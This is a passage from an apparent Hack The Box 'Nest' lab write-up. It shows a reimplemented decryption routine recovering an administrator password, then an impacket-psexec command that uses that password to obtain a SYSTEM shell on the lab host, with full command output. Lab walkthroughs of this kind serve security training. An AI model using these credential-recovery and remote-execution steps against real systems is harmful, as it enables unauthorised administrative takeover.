Decrypt Password
I was able to get some idea of how the program function by checking it on DnSpy. Then I realized that encryption/decryption mechanism used in the program, HqkLdap.exe was not that different from that of Utils.vb from RUScanner earlier.
So I re-wrote the program and named it crypto.cs.
It has been already compiled via mono on Kali and ready for action
┌──(kali㉿kali)-[~/…/htb/labs/nest/crypto]
└─$ ./crypto2.exe
enter 1 to encrypt a string or 2 to decrypt a string:
2
enter a string to decrypt:
yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
decrypted string: XtH4nkS4Pl4y1nGXUpon execution, crypto.cs printed out the decrypted string of the administrator’s password hash
XtH4nkS4Pl4y1nGX
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/nest/crypto]
└─$ impacket-psexec administrator:XtH4nkS4Pl4y1nGX@$IP -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file dYtZRito.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service OpLU on 10.10.10.178.....
[*] Starting service OpLU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
HTB-NEST
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::98c1:d5f4:5391:e244
Link-local IPv6 Address . . . . . : fe80::98c1:d5f4:5391:e244%13
IPv4 Address. . . . . . . . . . . : 10.10.10.178
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%13
10.10.10.2
Tunnel adapter isatap.{FD41A009-A80D-4DE0-8775-B220067C038B}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : System Level Compromise